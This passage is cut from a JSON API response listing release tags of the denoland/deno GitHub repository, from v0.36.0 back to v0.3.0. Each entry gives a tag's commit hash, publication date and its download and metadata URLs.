36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms